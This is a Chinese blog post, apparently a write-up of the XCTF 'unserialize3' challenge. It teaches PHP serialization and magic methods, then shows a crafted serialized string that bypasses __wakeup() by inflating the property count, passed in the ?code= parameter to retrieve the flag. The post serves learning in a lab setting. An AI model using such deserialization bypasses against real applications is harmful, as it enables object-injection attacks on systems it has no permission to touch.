unserialize3

清风徐来水波不兴

2020-05-04

0x01序列化与反序列化

序列化：将变量转换为可保存或传输的字符串的过程。
反序列化：在适当的的时候把这个字符串再转化成原来的变量使用。

优点：

存储和传输数据更方便，使程序维护性更高。

函数：

serialize,unserialize,json_encode,json_decode，

1、serialize、unserialize

<?php
$a="aaaa";
$a=serialize($a);//字符序列化
echo $a;
echo unserialize($a);//字符反序列化
echo PHP_EOL;


$b=array("aaaa","bb","c");
$b=serialize($b);//数组序列化
echo $b;
$b=unserialize($b);//数组反序列化
var_dump($b);
echo PHP_EOL;


s:4:"aaaa";aaaa
a:3:{i:0;s:4:"aaaa";i:1;s:2:"bb";i:2;s:1:"c";}array(3) {
  [0]=>
  string(4) "aaaa"
  [1]=>
  string(2) "bb"
  [2]=>
  string(1) "c"
}
?>
各个字符的意义:
o：表示对象
a：表示数组
s：表示字符
i：表示数字

//s表示字符，4表示有4个字符，内容为"aaaa"
//a表示数组，3表示有三个变量值，i:0表示第一个变量，s为字符串，4位4个字符

当数组值包含单双引号或冒号时，序列化后容易出现问题。所以，采用base64_encode和base64decode。

<?php
$a = array("a","b","c");
$a=base64_encode(serialize($a));
echo $a;
echo PHP_EOL;
$b=unserialize(base64_decode($a));
var_dump($b);

YTozOntpOjA7czoxOiJhIjtpOjE7czoxOiJiIjtpOjI7czoxOiJjIjt9
array(3) {
  [0]=>
  string(1) "a"
  [1]=>
  string(1) "b"
  [2]=>
  string(1) "c"
}

?>

但是采用base64编码后，增加了字符串长度，增加了存储空间，所以使用gzcompress、gzuncompress压缩字符串。

<?php
$a = array("a","b","c");
$b=base64_encode(serialize($a));
$c=base64_encode(gzcompress(serialize($a)));
echo $b;
echo PHP_EOL;
echo $c;
echo PHP_EOL;

$d=unserialize(base64_decode($b));
$e=unserialize(gzuncompress(base64_decode($c)));
var_dump($d);
echo PHP_EOL;
var_dump($e);

0x02魔术方法

PHP将所有以__开头的类方法保存为魔术方法，所以在定义方法时，除了魔术方法，不要以__为前缀。
serialize（）函数会检查类中是否存在一个魔术方法__sleep()，如果存在，该方法会被先调用，然后执行序列化操作，此功能用于清理对象。
unserialize()函数会检查类中是否存在一个魔术方法__wakeup()，如果存在，先调用。
__wakeup()执行漏洞：一个字符串或对象被序列化后，如果其属性被修改，则不会执行__wakeup()函数，绕过点。

0x03代码分析

class xctf{
public $flag = ‘111‘;
public function __wakeup(){
exit(‘bad requests‘);
}
?code=

//绕过__wakeup()魔术函数，得到flag

运行php代码，创建对象，序列化变量

<?php
class xctf{
public $flag = ‘111‘;
public function __wakeup(){
exit(‘bad requests‘);
}
}

$a=new xctf();
echo serialize($a);

//O:4:"xctf":1:{s:4:"flag";s:3:"111";}
?>

修改属性值O:4:"xctf":2:{s:4:"flag";s:3:"111";},1->2
code传参
得到flag

unserialize3

参考链接：
https://www.cnblogs.com/dayin1/p/11465832.html
https://www.jianshu.com/p/8f498198fc3d
https://blog.csdn.net/zz_Caleb/article/details/89361250

php序列化 serialize php 字符

清风徐来水波不兴

0 关注 0 粉丝 0 动态

相关推荐

PHP批斗大会之缺失的异常详解

背后性能影响还是挺大的。对比两种序列化场景，一个是json，另一个是serialize。所以 php 代码的异常设计还是任重而道远的，而这些已经设定的“旧的规范”要推翻，需要“勇气”，毕竟会影响所有的使用者。

klarclm 2019-07-09

扣丁学堂PHP培训简述PHP序列化变量的4种方法

print_r($o);当数组值包含如双引号、单引号或冒号等字符时，它们被反序列化后，可能会出现问题。为了克服这个问题，一个巧妙的技巧是使用base64_encode和base64_decode。$original = unserialize;但是base

WasteLand 2019-04-18

详解php中serialize()和unserialize()函数

这有利于存储或传递 PHP 的值，同时不丢失其类型和结构。比较有用的地方就是将数据存入数据库或记录在文件中的时候。感谢阅读，希望能帮助到大家，谢谢大家对本站的支持！

phpyounger 2019-04-17

[安洵杯 2019]easy_serialize_php PHP反序列化逃逸

　　最近都没刷题了，成懒狗了。。。$filter = ‘/‘.implode.‘/i‘;eval; //maybe you can find something in here!　　简单分析，发现有个phpinfo,访问一下，发现 d0g3_f1ag.ph

luadenis0 2020-06-07

PHP序列化与反序列化学习

<h6>序列化与反序列化学习</h6><p>把对象转换为字节序列的过程称为对象的序列化；把字节序列恢复为对象的过程称为对象的反序列化。phpclass UserInfo { public $name = &quo

olyqcool 2020-05-15

字符串转数组(php版)

* @param string|array $data 原始字符串，可以为数组、 json字符串、序列化字符串

JF0 2019-10-23

php cookie保存数组

通过序列化数组进行保存，但是在反序列化的时候要进行各种符号的转义，否则反序列化会返回false;这些预定义字符是：单引号 (‘)双引号 (“)反斜杠 (\)NULLstripslashes() 函数是 addslashes() 的反向操作，即：删除由 ad

Glassborken 2012-01-08

Jboot解决无法正确序列PHP写入的队列对象

JBoot默认是用FST进行Redis的对象序列化的，但PHP则是用普通的字符串，这导致JBoot无法正确读取key值。

我的程序员人生 2018-09-07

PHP反序列化漏洞系列之–PHP序列化和反序列化原理

对象的序列化和反序列化作用就不再赘述,php中序列化的结果是一个php自定义的字符串格式,有点类似json.把某个对象序列化之后,序列化的结果有自描述的功能.^_^. 用起来也非常简单,就两个接口.

spinachcqb 2019-06-26

php数组和字符串的相互转换，数据结构不变

一个描述 PHP 数据的函数。返回值是一个字符串。有的时候为了把一些数据转为字符串存起来，但是希望保持数据原来有结构和内容。echo $b; //这个就是描述过的数组但在这里是一个字符串而已$c=unserialize($b); //把描述过的数据恢复。p

王大壮 2011-08-02

PHP中JSON的应用，在某些时候会比传输xml更有效

互联网的今天，AJAX已经不是什么陌生的词汇了。说起AJAX，可能会立即想起因RSS而兴起的XML。XML的解析，恐怕已经不是什么难题了，特别是PHP5，大量的XML解析器的涌现，如最轻量级的SimpleXML。不过对于AJAX来说，XML的解析更倾向于前

静心斋 2011-07-11

PHP 拒绝服务漏洞(CVE-2016-7479)

PHP 拒绝服务漏洞发布日期：2017-01-12更新日期：2017-01-12受影响系统：。BUGTRAQ ID: 95151CVE ID: CVE-2016-7479PHP是广泛使用的通用目的脚本语言，特别适合于Web开发，可嵌入到HTML中。PHP

Noneyes 2017-01-12

PHP 远程代码执行漏洞(CVE-2016-7480)

PHP 远程代码执行漏洞发布日期：2017-01-12更新日期：2017-01-12受影响系统：。BUGTRAQ ID: 95152CVE ID: CVE-2016-7480PHP是广泛使用的通用目的脚本语言，特别适合于Web开发，可嵌入到HTML中。远程

mingguyouxi 2017-01-12

PHP ext/standard/var.c拒绝服务漏洞(CVE-2016-9936)

PHP ext/standard/var.c拒绝服务漏洞发布日期：2017-01-04更新日期：2017-01-05受影响系统：。CVE ID: CVE-2016-9936PHP是广泛使用的通用目的脚本语言，特别适合于Web开发，可嵌入到HTML中。PHP

qiyuandu 2017-01-05

WordPress 站点易遭新型 PHP 代码执行攻击

Secarma 公司的安全研究员 Sam Thomas 发现一种新型利用技术，可导致黑客通过使用此前被认为风险较低的函数触发 PHP 语言中严重的反序列化漏洞。这种新技术导致成千上万款 web 应用程序易遭远程代码执行攻击，包括一些受热门内容管理系统驱动的

wqzbxh 2018-09-03

PHP ext/snmp/snmp.c拒绝服务漏洞(CVE-2016-6295)

PHP ext/snmp/snmp.c拒绝服务漏洞发布日期：2016-07-25更新日期：2016-07-26受影响系统：。CVE ID: CVE-2016-6295PHP是广泛使用的通用目的脚本语言，特别适合于Web开发，可嵌入到HTML中。PHP &l

云中之巅 2016-07-26

PHP做APP接口-JSON和XML

扩展标记语言，用于标记电子文件使其具有结构性的标记语言，可以用来标记数据、定义数据类型，是一种允许用户对自己的标记语言进行定义的源语言。XML使用DTD文档类型定义来组织数据;格式统一，跨平台和语言，早已成为业界公认的标准。XML是标准通用标记语言

PHPArchitect 2015-03-24

应用PHP序列化数组技巧

PHP程序员在实际开发编程中经常会用到数组来完成自己的代码程序。如何才能正确的应用PHP序列化数组，以满足我们的需求呢？serialize --------- 将数组格式化成有序的字符串unserialize ----- 将数组还原成数组。在我个人经验主要

贝伦酱 2009-12-09

PHP不完整修复释放后重利用远程代码执行漏洞(CVE-2015-0231)

受影响系统：PHP PHP 5.6.xPHP PHP 5.5.xPHP PHP 5.4.x描述：BUGTRAQ ID: 72539CVE ID: CVE-2015-0231. PHP是广泛使用的通用目的脚本语言。

云中之巅 2015-02-16

技巧总结正确使用PHP JSON扩展

PHP JSON扩展的应用方法对于刚刚接触PHP语言不久的小菜鸟们肯定是非常陌生的。我们在接下来的内容中将会针对这一应用方法做一个详细的介绍。JSON 是一项旨在允许中间件创建使用 JavaScript 固有格式的对象的协议。它最强大的属性是它是一种轻量级

ghostrail 2009-12-04

清风徐来水波不兴

W3CSchool教程: HTML 教程; CSS 教程; Bootstrap 教程; Javascript 教程; jQuery 教程

后端教程: C 教程; Java 教程; PHP 教程; Python 教程; Go 教程

移动开发: Android 教程; Swift 教程; Kotlin 教程; jQuery Mobile 教程; ionic 教程

关于我们: 新闻动态; 联系方式; 招聘英才; 安科实验室; 帮助与反馈

安科网(Ancii)，中国第一极客网

Copyright © 2013 - 2019 Ancii.com

京ICP备18063983号京公网安备11010802014868号